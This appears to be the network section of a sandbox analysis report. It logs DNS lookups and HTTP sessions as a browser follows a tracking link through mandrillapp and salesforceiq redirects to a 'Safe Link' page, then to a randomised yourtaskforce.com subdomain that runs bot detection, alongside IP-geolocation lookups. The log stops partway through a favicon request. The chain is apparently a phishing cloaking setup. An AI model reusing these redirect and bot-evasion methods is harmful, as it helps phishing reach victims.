                                                Dec 23, 2024 15:22:17.101238012 CET44349868142.250.181.68192.168.2.5
                                                Dec 23, 2024 15:22:17.101305962 CET49868443192.168.2.5142.250.181.68
                                                Dec 23, 2024 15:22:18.035774946 CET49868443192.168.2.5142.250.181.68
                                                Dec 23, 2024 15:22:18.035818100 CET44349868142.250.181.68192.168.2.5
| Timestamp | Source IP | Dest IP | Checksum | Code | Type |
|---|---|---|---|---|---|
| Dec 23, 2024 15:21:16.406615973 CET | 192.168.2.5 | 1.1.1.1 | c246 | (Port unreachable) | Destination Unreachable |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 23, 2024 15:21:05.653889894 CET | 192.168.2.5 | 1.1.1.1 | 0xbae7 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 15:21:05.654289007 CET | 192.168.2.5 | 1.1.1.1 | 0xd700 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false |
| Dec 23, 2024 15:21:06.892887115 CET | 192.168.2.5 | 1.1.1.1 | 0x7382 | Standard query (0) | mandrillapp.com | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 15:21:06.893019915 CET | 192.168.2.5 | 1.1.1.1 | 0x439 | Standard query (0) | mandrillapp.com | 65 | IN (0x0001) | false |
| Dec 23, 2024 15:21:09.046540022 CET | 192.168.2.5 | 1.1.1.1 | 0x355c | Standard query (0) | app.salesforceiq.com | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 15:21:09.050508022 CET | 192.168.2.5 | 1.1.1.1 | 0x579d | Standard query (0) | app.salesforceiq.com | 65 | IN (0x0001) | false |
| Dec 23, 2024 15:21:11.788510084 CET | 192.168.2.5 | 1.1.1.1 | 0x6a4f | Standard query (0) | main.d3qs0n0oqv3g7o.amplifyapp.com | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 15:21:11.788817883 CET | 192.168.2.5 | 1.1.1.1 | 0x9dd6 | Standard query (0) | main.d3qs0n0oqv3g7o.amplifyapp.com | 65 | IN (0x0001) | false |
| Dec 23, 2024 15:21:14.838673115 CET | 192.168.2.5 | 1.1.1.1 | 0x4ba6 | Standard query (0) | 6p205g.ar.yourtaskforce.com | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 15:21:14.839081049 CET | 192.168.2.5 | 1.1.1.1 | 0x61a9 | Standard query (0) | 6p205g.ar.yourtaskforce.com | 65 | IN (0x0001) | false |
| Dec 23, 2024 15:21:15.963304043 CET | 192.168.2.5 | 1.1.1.1 | 0x2c64 | Standard query (0) | 6p205g.ar.yourtaskforce.com | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 15:21:15.991163015 CET | 192.168.2.5 | 1.1.1.1 | 0xa086 | Standard query (0) | 6p205g.ar.yourtaskforce.com | 65 | IN (0x0001) | false |
| Dec 23, 2024 15:21:18.850946903 CET | 192.168.2.5 | 1.1.1.1 | 0x6201 | Standard query (0) | 6p205g.ar.yourtaskforce.com | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 15:21:18.851234913 CET | 192.168.2.5 | 1.1.1.1 | 0xf676 | Standard query (0) | 6p205g.ar.yourtaskforce.com | 65 | IN (0x0001) | false |
| Dec 23, 2024 15:21:22.945466042 CET | 192.168.2.5 | 1.1.1.1 | 0x71f2 | Standard query (0) | 5mzcue1v.doc.checkiteasy.com | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 15:21:22.945600033 CET | 192.168.2.5 | 1.1.1.1 | 0x9b40 | Standard query (0) | 5mzcue1v.doc.checkiteasy.com | 65 | IN (0x0001) | false |
| Dec 23, 2024 15:21:25.567207098 CET | 192.168.2.5 | 1.1.1.1 | 0x25de | Standard query (0) | cdnjs.cloudflare.com | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 15:21:25.567392111 CET | 192.168.2.5 | 1.1.1.1 | 0x80db | Standard query (0) | cdnjs.cloudflare.com | 65 | IN (0x0001) | false |
| Dec 23, 2024 15:21:27.753551960 CET | 192.168.2.5 | 1.1.1.1 | 0xef6d | Standard query (0) | 5mzcue1v.doc.checkiteasy.com | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 15:21:27.753849983 CET | 192.168.2.5 | 1.1.1.1 | 0xde9b | Standard query (0) | 5mzcue1v.doc.checkiteasy.com | 65 | IN (0x0001) | false |
| Dec 23, 2024 15:21:27.908212900 CET | 192.168.2.5 | 1.1.1.1 | 0x8ca7 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 15:21:27.908359051 CET | 192.168.2.5 | 1.1.1.1 | 0xd622 | Standard query (0) | api.ipify.org | 65 | IN (0x0001) | false |
| Dec 23, 2024 15:21:27.909801006 CET | 192.168.2.5 | 1.1.1.1 | 0x2113 | Standard query (0) | logo.clearbit.com | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 15:21:27.909938097 CET | 192.168.2.5 | 1.1.1.1 | 0x35e6 | Standard query (0) | logo.clearbit.com | 65 | IN (0x0001) | false |
| Dec 23, 2024 15:21:29.723112106 CET | 192.168.2.5 | 1.1.1.1 | 0xe5b3 | Standard query (0) | ipapi.co | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 15:21:29.723397970 CET | 192.168.2.5 | 1.1.1.1 | 0x3fc1 | Standard query (0) | ipapi.co | 65 | IN (0x0001) | false |
| Dec 23, 2024 15:21:29.724586964 CET | 192.168.2.5 | 1.1.1.1 | 0x529 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 15:21:29.724728107 CET | 192.168.2.5 | 1.1.1.1 | 0xa89 | Standard query (0) | api.ipify.org | 65 | IN (0x0001) | false |
| Dec 23, 2024 15:21:32.002057076 CET | 192.168.2.5 | 1.1.1.1 | 0xa2f7 | Standard query (0) | ipapi.co | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 15:21:32.002295971 CET | 192.168.2.5 | 1.1.1.1 | 0x3d8f | Standard query (0) | ipapi.co | 65 | IN (0x0001) | false |

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 15:21:05.791537046 CET | 1.1.1.1 | 192.168.2.5 | 0xbae7 | No error (0) | www.google.com | | 142.250.181.68 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:05.793220997 CET | 1.1.1.1 | 192.168.2.5 | 0xd700 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Dec 23, 2024 15:21:07.194612980 CET | 1.1.1.1 | 192.168.2.5 | 0x7382 | No error (0) | mandrillapp.com | | 15.197.175.4 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:07.194612980 CET | 1.1.1.1 | 192.168.2.5 | 0x7382 | No error (0) | mandrillapp.com | | 76.223.125.47 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:09.637492895 CET | 1.1.1.1 | 192.168.2.5 | 0x355c | No error (0) | app.salesforceiq.com | apiq-apiv1-06027f9a-pb-48692342.us-west-2.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 15:21:09.637492895 CET | 1.1.1.1 | 192.168.2.5 | 0x355c | No error (0) | apiq-apiv1-06027f9a-pb-48692342.us-west-2.elb.amazonaws.com | | 44.226.126.181 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:09.637492895 CET | 1.1.1.1 | 192.168.2.5 | 0x355c | No error (0) | apiq-apiv1-06027f9a-pb-48692342.us-west-2.elb.amazonaws.com | | 54.184.191.144 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:09.637492895 CET | 1.1.1.1 | 192.168.2.5 | 0x355c | No error (0) | apiq-apiv1-06027f9a-pb-48692342.us-west-2.elb.amazonaws.com | | 52.39.232.93 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:09.637897968 CET | 1.1.1.1 | 192.168.2.5 | 0x579d | No error (0) | app.salesforceiq.com | apiq-apiv1-06027f9a-pb-48692342.us-west-2.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 15:21:12.211396933 CET | 1.1.1.1 | 192.168.2.5 | 0x6a4f | No error (0) | main.d3qs0n0oqv3g7o.amplifyapp.com | | 13.227.8.104 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:12.211396933 CET | 1.1.1.1 | 192.168.2.5 | 0x6a4f | No error (0) | main.d3qs0n0oqv3g7o.amplifyapp.com | | 13.227.8.36 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:12.211396933 CET | 1.1.1.1 | 192.168.2.5 | 0x6a4f | No error (0) | main.d3qs0n0oqv3g7o.amplifyapp.com | | 13.227.8.30 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:12.211396933 CET | 1.1.1.1 | 192.168.2.5 | 0x6a4f | No error (0) | main.d3qs0n0oqv3g7o.amplifyapp.com | | 13.227.8.16 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:16.406621933 CET | 1.1.1.1 | 192.168.2.5 | 0x4ba6 | No error (0) | 6p205g.ar.yourtaskforce.com | | 135.225.111.190 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:16.406898975 CET | 1.1.1.1 | 192.168.2.5 | 0x2c64 | No error (0) | 6p205g.ar.yourtaskforce.com | | 135.225.111.190 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:18.989501953 CET | 1.1.1.1 | 192.168.2.5 | 0x6201 | No error (0) | 6p205g.ar.yourtaskforce.com | | 135.225.111.190 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:23.517534971 CET | 1.1.1.1 | 192.168.2.5 | 0x71f2 | No error (0) | 5mzcue1v.doc.checkiteasy.com | | 135.225.111.190 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:25.704703093 CET | 1.1.1.1 | 192.168.2.5 | 0x25de | No error (0) | cdnjs.cloudflare.com | | 104.17.24.14 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:25.704703093 CET | 1.1.1.1 | 192.168.2.5 | 0x25de | No error (0) | cdnjs.cloudflare.com | | 104.17.25.14 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:25.704745054 CET | 1.1.1.1 | 192.168.2.5 | 0x80db | No error (0) | cdnjs.cloudflare.com | | | 65 | IN (0x0001) | false
Dec 23, 2024 15:21:27.892862082 CET | 1.1.1.1 | 192.168.2.5 | 0xef6d | No error (0) | 5mzcue1v.doc.checkiteasy.com | | 135.225.111.190 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:28.044847012 CET | 1.1.1.1 | 192.168.2.5 | 0x8ca7 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:28.044847012 CET | 1.1.1.1 | 192.168.2.5 | 0x8ca7 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:28.044847012 CET | 1.1.1.1 | 192.168.2.5 | 0x8ca7 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:28.061479092 CET | 1.1.1.1 | 192.168.2.5 | 0xd622 | No error (0) | api.ipify.org | | | 65 | IN (0x0001) | false
Dec 23, 2024 15:21:28.190449953 CET | 1.1.1.1 | 192.168.2.5 | 0x2113 | No error (0) | logo.clearbit.com | d26p066pn2w0s0.cloudfront.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 15:21:28.190449953 CET | 1.1.1.1 | 192.168.2.5 | 0x2113 | No error (0) | d26p066pn2w0s0.cloudfront.net | | 13.227.8.64 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:28.190449953 CET | 1.1.1.1 | 192.168.2.5 | 0x2113 | No error (0) | d26p066pn2w0s0.cloudfront.net | | 13.227.8.72 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:28.190449953 CET | 1.1.1.1 | 192.168.2.5 | 0x2113 | No error (0) | d26p066pn2w0s0.cloudfront.net | | 13.227.8.47 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:28.190449953 CET | 1.1.1.1 | 192.168.2.5 | 0x2113 | No error (0) | d26p066pn2w0s0.cloudfront.net | | 13.227.8.65 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:28.195954084 CET | 1.1.1.1 | 192.168.2.5 | 0x35e6 | No error (0) | logo.clearbit.com | d26p066pn2w0s0.cloudfront.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 15:21:30.011220932 CET | 1.1.1.1 | 192.168.2.5 | 0xe5b3 | No error (0) | ipapi.co | | 172.67.69.226 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:30.011220932 CET | 1.1.1.1 | 192.168.2.5 | 0xe5b3 | No error (0) | ipapi.co | | 104.26.9.44 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:30.011220932 CET | 1.1.1.1 | 192.168.2.5 | 0xe5b3 | No error (0) | ipapi.co | | 104.26.8.44 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:30.011240005 CET | 1.1.1.1 | 192.168.2.5 | 0x3fc1 | No error (0) | ipapi.co | | | 65 | IN (0x0001) | false
Dec 23, 2024 15:21:30.011274099 CET | 1.1.1.1 | 192.168.2.5 | 0xa89 | No error (0) | api.ipify.org | | | 65 | IN (0x0001) | false
Dec 23, 2024 15:21:30.011287928 CET | 1.1.1.1 | 192.168.2.5 | 0x529 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:30.011287928 CET | 1.1.1.1 | 192.168.2.5 | 0x529 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:30.011287928 CET | 1.1.1.1 | 192.168.2.5 | 0x529 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:32.142891884 CET | 1.1.1.1 | 192.168.2.5 | 0xa2f7 | No error (0) | ipapi.co | | 104.26.9.44 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:32.142891884 CET | 1.1.1.1 | 192.168.2.5 | 0xa2f7 | No error (0) | ipapi.co | | 104.26.8.44 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:32.142891884 CET | 1.1.1.1 | 192.168.2.5 | 0xa2f7 | No error (0) | ipapi.co | | 172.67.69.226 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 15:21:32.144035101 CET | 1.1.1.1 | 192.168.2.5 | 0x3d8f | No error (0) | ipapi.co | | | 65 | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49714 | 15.197.175.4 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 14:21:08 UTC | 1309 | OUT | GET /track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0 HTTP/1.1
                                                Host: mandrillapp.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
2024-12-23 14:21:09 UTC | 758 | IN | HTTP/1.1 302 Found
                                                Date: Mon, 23 Dec 2024 14:21:08 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Server: nginx
                                                Set-Cookie: PHPSESSID=a8h7k2ec89h6sipgf46j1o9eqd; expires=Tue, 24 Dec 2024 00:21:08 GMT; Max-Age=36000; path=/; secure; HttpOnly
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                Set-Cookie: PHPSESSID=a8h7k2ec89h6sipgf46j1o9eqd; path=/; secure; HttpOnly; SameSite=Strict
                                                Location: https://app.salesforceiq.com/r?t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&target=631f420eed13ca3bcf77c324&url=https://main.d3qs0n0oqv3g7o.amplifyapp.com
2024-12-23 14:21:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49716 | 44.226.126.181 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 14:21:11 UTC | 886 | OUT | GET /r?t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&target=631f420eed13ca3bcf77c324&url=https://main.d3qs0n0oqv3g7o.amplifyapp.com HTTP/1.1
                                                Host: app.salesforceiq.com
                                                Connection: keep-alive
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
2024-12-23 14:21:11 UTC | 321 | IN | HTTP/1.1 307 Temporary Redirect
                                                Date: Mon, 23 Dec 2024 14:21:11 GMT
                                                Content-Length: 0
                                                Connection: close
                                                x-build-time: {{BUILD_TIME}}
                                                txnId: 125zpl91jvg76cz07im0n0qpj
                                                Access-Control-Expose-Headers: txnid
                                                Timing-Allow-Origin: *
                                                Location: https://main.d3qs0n0oqv3g7o.amplifyapp.com
                                                Server: Jetty(9.3.z-SNAPSHOT)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49717 | 13.227.8.104 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 14:21:13 UTC | 677 | OUT | GET / HTTP/1.1
                                                Host: main.d3qs0n0oqv3g7o.amplifyapp.com
                                                Connection: keep-alive
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
2024-12-23 14:21:14 UTC | 541 | IN | HTTP/1.1 200 OK
                                                Content-Type: text/html
                                                Content-Length: 409
                                                Connection: close
                                                Date: Sat, 21 Dec 2024 15:02:44 GMT
                                                Server: AmazonS3
                                                Accept-Ranges: bytes
                                                ETag: "8aea5da6f3c846841267ee24e59df12f"
                                                Last-Modified: Sat, 21 Dec 2024 14:33:53 GMT
                                                Cache-Control: public, max-age=0, s-maxage=31536000
                                                X-Cache: Hit from cloudfront
                                                Via: 1.1 c5be8caec2de3502cf9672040e52189a.cloudfront.net (CloudFront)
                                                X-Amz-Cf-Pop: BAH53-C1
                                                Alt-Svc: h3=":443"; ma=86400
                                                X-Amz-Cf-Id: 9EL-rz9LqWqgUkwB4LLXiwC3L8MHxlxKzycPiHzQrpKcGpneb66S-g==
                                                Age: 170310
2024-12-23 14:21:14 UTC | 409 | IN | Data Ascii: <!DOCTYPE html><html><head><meta charset="UTF-8"><title>Safe Link</title><script> let arr = new Uint8Array(6); crypto.getRandomValues(arr); let sub = Array.from(arr, b => (b % 36).toString(36)).join(''); let domain = "ar.yourtaskforce.com";


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49725 | 135.225.111.190 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 14:21:17 UTC | 710 | OUT | GET / HTTP/1.1
                                                Host: 6p205g.ar.yourtaskforce.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: document
                                                Referer: https://main.d3qs0n0oqv3g7o.amplifyapp.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
2024-12-23 14:21:18 UTC | 373 | IN | HTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:18 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Permissions-Policy: geolocation=(), microphone=(), camera=()
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
2024-12-23 14:21:18 UTC | 242 | IN | Data Ascii: e7<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Just a moment...</title> <link rel="icon" type="image/x-icon" href="favicon.ico"> <script src="?_js=_1"></script></head><body></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49726 | 135.225.111.190 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 14:21:18 UTC | 546 | OUT | GET /?_js=_1 HTTP/1.1
                                                Host: 6p205g.ar.yourtaskforce.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://6p205g.ar.yourtaskforce.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
2024-12-23 14:21:18 UTC | 378 | IN | HTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:18 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Permissions-Policy: geolocation=(), microphone=(), camera=()
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/javascript;charset=UTF-8
2024-12-23 14:21:18 UTC | 941 | IN | Data Ascii: 3a1const currentURL = new URL(window.location.href);const baseURL = `${currentURL.origin}${currentURL.pathname}`;const newURL = `${baseURL}?_jd=botd`;import(newURL).then((_b) => _b.load()).then((_b) => _b.detect()).then((_r) => { let value;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49734 | 135.225.111.190 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 14:21:20 UTC | 597 | OUT | GET /?_jd=botd HTTP/1.1
                                                Host: 6p205g.ar.yourtaskforce.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Origin: https://6p205g.ar.yourtaskforce.com
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://6p205g.ar.yourtaskforce.com/?_js=_1
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
2024-12-23 14:21:20 UTC | 378 | IN | HTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:20 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Permissions-Policy: geolocation=(), microphone=(), camera=()
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/javascript;charset=UTF-8
2024-12-23 14:21:20 UTC | 7814 | IN | Data Ascii: 1f20/** * Fingerprint BotD v1.9.1 - Copyright (c) FingerprintJS, Inc, 2024 (https://fingerprint.com) * Licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) license. */var e=function(n,t){return e=Object.setPrototypeOf||{__prot
2024-12-23 14:21:20 UTC | 160 | IN | Data Ascii: sCaptureMediaStream"in t])>=4?"gecko":"unknown"}var p={android:function(){var e=m(),n="chromium"===e,t="gecko"===e;if(!n&&!t)return!1;var r=window;return v(["on
2024-12-23 14:21:20 UTC | 2 | IN | Data Raw: 0d 0a
2024-12-23 14:21:20 UTC | 7241 | IN | Data Ascii: 1c3corientationchange"in r,"orientation"in r,n&&!("SharedWorker"in r),t&&/android/i.test(navigator.appVersion)])>=2},browserKind:function(){var e,n=null===(e=navigator.userAgent)||void 0===e?void 0:e.toLowerCase();return c(n,"edg/")?"edge":c(n,"trident"


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.5 | 49735 | 135.225.111.190 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-23 14:21:20 UTC | 610 | OUT | GET /favicon.ico HTTP/1.1
                                                Host: 6p205g.ar.yourtaskforce.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
